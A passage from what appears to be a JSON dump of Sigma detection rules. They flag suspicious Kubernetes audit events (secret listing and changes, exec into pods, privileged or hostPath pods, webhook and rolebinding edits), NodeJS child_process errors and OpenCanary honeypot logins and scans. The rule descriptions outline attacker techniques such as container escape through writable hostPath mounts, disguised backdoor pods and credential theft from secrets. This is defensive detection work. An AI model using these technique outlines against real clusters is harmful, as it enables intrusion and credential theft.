    "content": "title: Kubernetes Admission Controller Modification\nid: eed82177-38f5-4299-8a76-098d50d225ab\nrelated:\n    - id: 6ad91e31-53df-4826-bd27-0166171c8040\n      type: similar\nstatus: test\ndescription: |\n    Detects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials.\nreferences:\n    - https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/\n    - https://security.padok.fr/en/blog/kubernetes-webhook-attackers\nauthor: kelnage\ndate: 2024-07-11\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1078\n    - attack.credential-access\n    - attack.t1552\n    - attack.t1552.007\nlogsource:\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        objectRef.apiGroup: 'admissionregistration.k8s.io'\n        objectRef.resource:\n            - 'mutatingwebhookconfigurations'\n            - 'validatingwebhookconfigurations'\n        verb:\n            - 'create'\n            - 'delete'\n            - 'patch'\n            - 'replace'\n            - 'update'\n    condition: selection\nfalsepositives:\n    - Modifying the Kubernetes Admission Controller may need to be done by a system administrator.\n    - Automated processes may need to take these actions and may need to be filtered.\nlevel: medium\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_cronjob_modification.yml",
    "content": "title: Kubernetes CronJob/Job Modification\nid: 0c9b3bda-41a6-4442-9345-356ae86343dc\nrelated:\n    - id: cd3a808c-c7b7-4c50-a2f3-f4cfcd436435\n      type: similar\nstatus: test\ndescription: |\n    Detects when a Kubernetes CronJob or Job is created or modified.\n    A Kubernetes Job creates one or more pods to accomplish a specific task, and a CronJob creates Jobs on a recurring schedule.\n    An adversary can take advantage of this Kubernetes object to schedule Jobs to run containers that execute malicious code within a cluster, allowing them to achieve persistence.\nreferences:\n    - https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/\n    - https://www.redhat.com/en/blog/protecting-kubernetes-against-mitre-attck-persistence#technique-33-kubernetes-cronjob\nauthor: kelnage\ndate: 2024-07-11\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.execution\nlogsource:\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        objectRef.apiGroup: 'batch'\n        objectRef.resource:\n            - 'cronjobs'\n            - 'jobs'\n        verb:\n            - 'create'\n            - 'delete'\n            - 'patch'\n            - 'replace'\n            - 'update'\n    condition: selection\nfalsepositives:\n    - Modifying a Kubernetes Job or CronJob may need to be done by a system administrator.\n    - Automated processes may need to take these actions and may need to be filtered.\nlevel: medium\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_deployment_deleted.yml",
    "content": "title: Deployment Deleted From Kubernetes Cluster\nid: 40967487-139b-4811-81d9-c9767a92aa5a\nstatus: test\ndescription: |\n    Detects the removal of a deployment from a Kubernetes cluster.\n    This could indicate disruptive activity aiming to impact business operations.\nreferences:\n    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Data%20destruction/\nauthor: Leo Tsaousis (@laripping)\ndate: 2024-03-26\ntags:\n    - attack.t1498\n    - attack.impact\nlogsource:\n    category: application\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        verb: 'delete'\n        objectRef.resource: 'deployments'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_events_deleted.yml",
    "content": "title: Kubernetes Events Deleted\nid: 3132570d-cab2-4561-9ea6-1743644b2290\nrelated:\n    - id: 225d8b09-e714-479c-a0e4-55e6f29adf35\n      type: derived\nstatus: test\ndescription: |\n    Detects when events are deleted in Kubernetes.\n    An adversary may delete Kubernetes events in an attempt to evade detection.\nreferences:\n    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Delete%20K8S%20events/\nauthor: Leo Tsaousis (@laripping)\ndate: 2024-03-26\ntags:\n    - attack.defense-evasion\n    - attack.t1070\nlogsource:\n    category: application\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        verb: 'delete'\n        objectRef.resource: 'events'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_exec_into_container.yml",
    "content": "title: Potential Remote Command Execution In Pod Container\nid: a1b0ca4e-7835-413e-8471-3ff2b8a66be6\nstatus: test\ndescription: |\n    Detects attempts to execute remote commands, within a Pod's container using e.g. the \"kubectl exec\" command.\nreferences:\n    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Exec%20into%20container/\nauthor: Leo Tsaousis (@laripping)\ndate: 2024-03-26\ntags:\n    - attack.t1609\n    - attack.execution\nlogsource:\n    category: application\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        verb: 'create'\n        objectRef.resource: 'pods'\n        objectRef.subresource: 'exec'\n    condition: selection\nfalsepositives:\n    - Legitimate debugging activity. Investigate the identity performing the requests and their authorization.\nlevel: medium\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_hostpath_mount.yml",
    "content": "title: Container With A hostPath Mount Created\nid: 402b955c-8fe0-4a8c-b635-622b4ac5f902\nstatus: test\ndescription: |\n    Detects creation of a container with a hostPath mount.\n    A hostPath volume mounts a directory or a file from the node to the container.\n    Attackers who have permissions to create a new pod in the cluster may create one with a writable hostPath volume and chroot to escape to the underlying node.\nreferences:\n    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Writable%20hostPath%20mount/\n    - https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216\nauthor: Leo Tsaousis (@laripping)\ndate: 2024-03-26\ntags:\n    - attack.t1611\n    - attack.privilege-escalation\nlogsource:\n    category: application\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        verb: 'create'\n        objectRef.resource: 'pods'\n        hostPath: '*' # Note: Add the \"exists\" when it's implemented in SigmaHQ/Aurora\n    condition: selection\nfalsepositives:\n    - The DaemonSet controller creates pods with hostPath volumes within the kube-system namespace.\nlevel: low\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_pod_in_system_namespace.yml",
    "content": "title: Creation Of Pod In System Namespace\nid: a80d927d-ac6e-443f-a867-e8d6e3897318\nstatus: test\ndescription: |\n    Detects deployments of pods within the kube-system namespace, which could be intended to imitate system pods.\n    System pods, created by controllers such as Deployments or DaemonSets have random suffixes in their names.\n    Attackers can use this fact and name their backdoor pods as if they were created by these controllers to avoid detection.\n    Deployment of such a backdoor container e.g. named kube-proxy-bv61v, could be attempted in the kube-system namespace alongside the other administrative containers.\nreferences:\n    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Pod%20or%20container%20name%20similarily/\nauthor: Leo Tsaousis (@laripping)\ndate: 2024-03-26\ntags:\n    - attack.defense-evasion\n    - attack.t1036.005\nlogsource:\n    category: application\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        verb: 'create'\n        objectRef.resource: 'pods'\n        objectRef.namespace: kube-system\n    condition: selection\nfalsepositives:\n    - System components such as daemon-set-controller and kube-scheduler also create pods in the kube-system namespace\nlevel: medium\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_privileged_pod_creation.yml",
    "content": "title: Privileged Container Deployed\nid: c5cd1b20-36bb-488d-8c05-486be3d0cb97\nstatus: test\ndescription: |\n    Detects the creation of a \"privileged\" container, an action which could be indicative of a threat actor mounting a container breakout attacks.\n    A privileged container is a container that can access the host with all of the root capabilities of the host machine. This allows it to view, interact and modify processes, network operations, IPC calls, the file system, mount points, SELinux configurations etc. as the root user on the host.\n    Various versions of \"privileged\" containers can be specified, e.g. by setting the securityContext.privileged flag in the resource specification, setting non-standard Linux capabilities, or configuring the hostNetwork/hostPID fields\nreferences:\n    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Privileged%20container/\n    - https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-kubernetes.html#privilegeescalation-kubernetes-privilegedcontainer\n    - https://www.elastic.co/guide/en/security/current/kubernetes-pod-created-with-hostnetwork.html\n    - https://www.elastic.co/guide/en/security/current/kubernetes-container-created-with-excessive-linux-capabilities.html\nauthor: Leo Tsaousis (@laripping)\ndate: 2024-03-26\ntags:\n    - attack.t1611\n    - attack.privilege-escalation\nlogsource:\n    category: application\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        verb: 'create'\n        objectRef.resource: 'pods'\n        capabilities: '*' # Note: Add the \"exists\" when it's implemented in SigmaHQ/Aurora\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_rbac_permisions_listing.yml",
    "content": "title: RBAC Permission Enumeration Attempt\nid: 84b777bd-c946-4d17-aa2e-c39f5a454325\nstatus: test\ndescription: |\n    Detects identities attempting to enumerate their Kubernetes RBAC permissions.\n    In the early stages of a breach, attackers will aim to list the permissions they have within the compromised environment.\n    In a Kubernetes cluster, this can be achieved by interacting with the API server, and querying the SelfSubjectAccessReview API via e.g. a \"kubectl auth can-i --list\" command.\n    This will enumerate the Role-Based Access Controls (RBAC) rules defining the compromised user's authorization.\nreferences:\n    - https://www.elastic.co/guide/en/security/current/kubernetes-suspicious-self-subject-review.html\nauthor: Leo Tsaousis (@laripping)\ndate: 2024-03-26\ntags:\n    - attack.t1069.003\n    - attack.t1087.004\n    - attack.discovery\nlogsource:\n    category: application\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        verb: 'create'\n        apiGroup: 'authorization.k8s.io'\n        objectRef.resource: 'selfsubjectrulesreviews'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_rolebinding_modification.yml",
    "content": "title: Kubernetes Rolebinding Modification\nid: 10b97915-ec8d-455f-a815-9a78926585f6\nrelated:\n    - id: 0322d9f2-289a-47c2-b5e1-b63c90901a3e\n      type: similar\nstatus: test\ndescription: |\n    Detects when a Kubernetes Rolebinding is created or modified.\nreferences:\n    - https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/\n    - https://medium.com/@seifeddinerajhi/kubernetes-rbac-privilege-escalation-exploits-and-mitigations-26c07629eeab\nauthor: kelnage\ndate: 2024-07-11\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        objectRef.apiGroup: 'rbac.authorization.k8s.io'\n        objectRef.resource:\n            - 'clusterrolebindings'\n            - 'rolebindings'\n        verb:\n            - 'create'\n            - 'delete'\n            - 'patch'\n            - 'replace'\n            - 'update'\n    condition: selection\nfalsepositives:\n    - Modifying a Kubernetes Rolebinding may need to be done by a system administrator.\n    - Automated processes may need to take these actions and may need to be filtered.\nlevel: medium\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_secrets_enumeration.yml",
    "content": "title: Kubernetes Secrets Enumeration\nid: eeb3e9e1-b685-44e4-9232-6bb701f925b5\nrelated:\n    - id: 7ee0b4aa-d8d4-4088-b661-20efdf41a04c\n      type: derived\nstatus: test\ndescription: Detects enumeration of Kubernetes secrets.\nreferences:\n    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/List%20K8S%20secrets/\nauthor: Leo Tsaousis (@laripping)\ndate: 2024-03-26\ntags:\n    - attack.t1552.007\n    - attack.credential-access\nlogsource:\n    category: application\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        verb: 'list'\n        objectRef.resource: 'secrets'\n    condition: selection\nfalsepositives:\n    - The Kubernetes dashboard occasionally accesses the kubernetes-dashboard-key-holder secret\nlevel: low\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_secrets_modified_or_deleted.yml",
    "content": "title: Kubernetes Secrets Modified or Deleted\nid: 58d31a75-a4f8-4c40-985b-373d58162ca2\nrelated:\n    - id: 2f0bae2d-bf20-4465-be86-1311addebaa3\n      type: similar\nstatus: test\ndescription: |\n    Detects when Kubernetes Secrets are Modified or Deleted.\nreferences:\n    - https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/\n    - https://commandk.dev/blog/guide-to-audit-k8s-secrets-for-compliance/\nauthor: kelnage\ndate: 2024-07-11\ntags:\n    - attack.credential-access\nlogsource:\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        objectRef.resource: 'secrets'\n        verb:\n            - 'create'\n            - 'delete'\n            - 'patch'\n            - 'replace'\n            - 'update'\n    condition: selection\nfalsepositives:\n    - Secrets being modified or deleted may be performed by a system administrator.\n    - Automated processes may need to take these actions and may need to be filtered.\nlevel: medium\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_serviceaccount_creation.yml",
    "content": "title: New Kubernetes Service Account Created\nid: e31bae15-83ed-473e-bf31-faf4f8a17d36\nrelated:\n    - id: 12d027c3-b48c-4d9d-8bb6-a732200034b2\n      type: derived\nstatus: test\ndescription: |\n    Detects creation of new Kubernetes service account, which could indicate an attacker's attempt to persist within a cluster.\nreferences:\n    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/container%20service%20account/\nauthor: Leo Tsaousis (@laripping)\ndate: 2024-03-26\ntags:\n    - attack.persistence\n    - attack.t1136\nlogsource:\n    category: application\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        verb: 'create'\n        objectRef.resource: 'serviceaccounts'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_sidecar_injection.yml",
    "content": "title: Potential Sidecar Injection Into Running Deployment\nid: ad9012a6-e518-4432-9890-f3b82b8fc71f\nstatus: test\ndescription: |\n    Detects attempts to inject a sidecar container into a running deployment.\n    A sidecar container is an additional container within a pod, that resides alongside the main container.\n    One way to add containers to running resources like Deployments/DeamonSets/StatefulSets, is via a \"kubectl patch\" operation.\n    By injecting a new container within a legitimate pod, an attacker can run their code and hide their activity, instead of running their own separated pod in the cluster.\nreferences:\n    - https://kubernetes.io/docs/tasks/manage-kubernetes-objects/update-api-object-kubectl-patch\n    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Sidecar%20Injection/\nauthor: Leo Tsaousis (@laripping)\ndate: 2024-03-26\ntags:\n    - attack.t1609\n    - attack.execution\nlogsource:\n    category: application\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        verb: 'patch'\n        apiGroup: 'apps'\n        objectRef.resource: 'deployments'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_unauthorized_unauthenticated_actions.yml",
    "content": "title: Kubernetes Unauthorized or Unauthenticated Access\nid: 0d933542-1f1f-420d-97d4-21b2c3c492d9\nstatus: test\ndescription: |\n    Detects when a request to the Kubernetes API is rejected due to lack of authorization or due to an expired authentication token being used.\n    This may indicate an attacker attempting to leverage credentials they have obtained.\nreferences:\n    - https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/\n    - https://www.datadoghq.com/blog/monitor-kubernetes-audit-logs/#monitor-api-authentication-issues\nauthor: kelnage\ndate: 2024-04-12\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        responseStatus.code:\n            - 401 # Unauthorized\n            - 403 # Forbidden\n    condition: selection\nfalsepositives:\n    - A misconfigured RBAC policy, a mistake by a valid user, or a wider issue with authentication tokens can also generate these errors.\nlevel: low\n"
  },
  {
    "path": "rules/application/nodejs/nodejs_rce_exploitation_attempt.yml",
    "content": "title: Potential RCE Exploitation Attempt In NodeJS\nid: 97661d9d-2beb-4630-b423-68985291a8af\nstatus: test\ndescription: Detects process execution related errors in NodeJS. If the exceptions are caused due to user input then they may suggest an RCE vulnerability.\nreferences:\n    - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs\nauthor: Moti Harmats\ndate: 2023-02-11\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: nodejs\n    definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'\ndetection:\n    keywords:\n        - 'node:child_process'\n    condition: keywords\nfalsepositives:\n    - Puppeteer invocation exceptions often contain child_process related errors, that doesn't necessarily mean that the app is vulnerable.\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_ftp_login_attempt.yml",
    "content": "title: OpenCanary - FTP Login Attempt\nid: 6991bc2b-ae2e-447f-bc55-3a1ba04c14e5\nstatus: test\ndescription: Detects instances where an FTP service on an OpenCanary node has had a login attempt.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.initial-access\n    - attack.exfiltration\n    - attack.lateral-movement\n    - attack.t1190\n    - attack.t1021\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 2000\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_git_clone_request.yml",
    "content": "title: OpenCanary - GIT Clone Request\nid: 4fe17521-aef3-4e6a-9d6b-4a7c8de155a8\nstatus: test\ndescription: Detects instances where a GIT service on an OpenCanary node has had Git Clone request.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.collection\n    - attack.t1213\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 16001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_http_get.yml",
    "content": "title: OpenCanary - HTTP GET Request\nid: af6c3078-84cd-4c68-8842-08b76bd81b13\nstatus: test\ndescription: Detects instances where an HTTP service on an OpenCanary node has received a GET request.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 3000\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_http_post_login_attempt.yml",
    "content": "title: OpenCanary - HTTP POST Login Attempt\nid: af1ac430-df6b-4b38-b976-0b52f07a0252\nstatus: test\ndescription: |\n    Detects instances where an HTTP service on an OpenCanary node has had login attempt via Form POST.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 3001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_httpproxy_login_attempt.yml",
    "content": "title: OpenCanary - HTTPPROXY Login Attempt\nid: 5498fc09-adc6-4804-b9d9-5cca1f0b8760\nstatus: test\ndescription: |\n    Detects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1090\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 7001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_mssql_login_sqlauth.yml",
    "content": "title: OpenCanary - MSSQL Login Attempt Via SQLAuth\nid: 3ec9a16d-0b4f-4967-9542-ebf38ceac7dd\nstatus: test\ndescription: |\n    Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.credential-access\n    - attack.collection\n    - attack.t1003\n    - attack.t1213\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 9001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_mssql_login_winauth.yml",
    "content": "title: OpenCanary - MSSQL Login Attempt Via Windows Authentication\nid: 6e78f90f-0043-4a01-ac41-f97681613a66\nstatus: test\ndescription: |\n    Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.credential-access\n    - attack.collection\n    - attack.t1003\n    - attack.t1213\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 9002\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_mysql_login_attempt.yml",
    "content": "title: OpenCanary - MySQL Login Attempt\nid: e7d79a1b-25ed-4956-bd56-bd344fa8fd06\nstatus: test\ndescription: Detects instances where a MySQL service on an OpenCanary node has had a login attempt.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.credential-access\n    - attack.collection\n    - attack.t1003\n    - attack.t1213\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 8001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_ntp_monlist.yml",
    "content": "title: OpenCanary - NTP Monlist Request\nid: 7cded4b3-f09e-405a-b96f-24248433ba44\nstatus: test\ndescription: Detects instances where an NTP service on an OpenCanary node has had a NTP monlist request.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.impact\n    - attack.t1498\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 11001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_portscan_nmap_fin_scan.yaml",
    "content": "title: OpenCanary - NMAP FIN Scan\nid: eae8c0c8-e5da-450a-9d7d-66aa56cd26b6\nstatus: experimental\ndescription: Detects instances where an OpenCanary node has been targeted by a NMAP FIN Scan\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Marco Pedrinazzi (@pedrinazziM)\ndate: 2026-01-06\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 5005\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_portscan_nmap_null_scan.yaml",
    "content": "title: OpenCanary - NMAP NULL Scan\nid: 68b8547b-107f-43f3-97fb-900a7d63c190\nstatus: experimental\ndescription: Detects instances where an OpenCanary node has been targeted by a NMAP NULL Scan\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Marco Pedrinazzi (@pedrinazziM)\ndate: 2026-01-06\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 5003\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_portscan_nmap_os_scan.yaml",
    "content": "title: OpenCanary - NMAP OS Scan\nid: e8a677fd-248c-4eab-94df-de2f6f645884\nstatus: experimental\ndescription: Detects instances where an OpenCanary node has been targeted by a NMAP OS Scan\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Marco Pedrinazzi (@pedrinazziM)\ndate: 2026-01-06\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 5002\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_portscan_nmap_xmas_scan.yaml",
    "content": "title: OpenCanary - NMAP XMAS Scan\nid: d7553d7b-f485-479c-b192-cdac6edd83a4\nstatus: experimental\ndescription: Detects instances where an OpenCanary node has been targeted by a NMAP XMAS Scan\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Marco Pedrinazzi (@pedrinazziM)\ndate: 2026-01-06\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 5004\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_portscan_syn_scan.yaml",
    "content": "title: OpenCanary - Host Port Scan (SYN Scan)\nid: 974be8d2-283e-4033-ab08-7505b84204d0\nstatus: experimental\ndescription: Detects instances where an OpenCanary node has been targeted by a SYN port scan.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Marco Pedrinazzi (@pedrinazziM)\ndate: 2026-01-06\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 5001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_rdp_connection_attempt.yaml",
    "content": "title: OpenCanary - RDP New Connection Attempt\nid: 598290cf-5932-45cd-9123-be1e05ab4f2e\nstatus: experimental\ndescription: Detects instances where an RDP service on an OpenCanary node has had a connection attempt.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Marco Pedrinazzi (@pedrinazziM)\ndate: 2026-01-06\ntags:\n    - attack.initial-access\n    - attack.lateral-movement\n    - attack.t1133\n    - attack.t1021.001\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 14001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_redis_command.yml",
    "content": "title: OpenCanary - REDIS Action Command Attempt\nid: 547dfc53-ebf6-4afe-8d2e-793d9574975d\nstatus: test\ndescription: Detects instances where a REDIS service on an OpenCanary node has had an action command attempted.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.credential-access\n    - attack.collection\n    - attack.t1003\n    - attack.t1213\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 17001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_sip_request.yml",
    "content": "title: OpenCanary - SIP Request\nid: e30de276-68ec-435c-ab99-ef3befec6c61\nstatus: test\ndescription: Detects instances where an SIP service on an OpenCanary node has had a SIP request.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.collection\n    - attack.t1123\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 15001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_smb_file_open.yml",
